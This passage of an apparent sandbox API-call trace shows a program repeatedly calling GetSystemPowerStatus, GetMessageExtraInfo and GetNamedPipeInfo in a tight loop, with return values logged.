	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.341] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.341] GetMessageExtraInfo () returned 0x0
	[0026.341] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.342] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.342] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.342] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.343] GetMessageExtraInfo () returned 0x0
	[0026.343] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.343] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.344] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.344] GetMessageExtraInfo () returned 0x0
	[0026.344] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.345] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.345] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.345] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.346] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.346] GetMessageExtraInfo () returned 0x0
	[0026.346] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
	[0026.347] GetSystemPowerStatus (in: lpSystemPowerStatus=0x18edd4 | out: lpSystemPowerStatus=0x18edd4) returned 1
	[0026.347] GetMessageExtraInfo () returned 0x0
	[0026.347] GetNamedPipeInfo (in: hNamedPipe=0x0, lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0 | out: lpFlags=0x0, lpOutBufferSize=0x0, lpInBufferSize=0x0, lpMaxInstances=0x0) returned 0
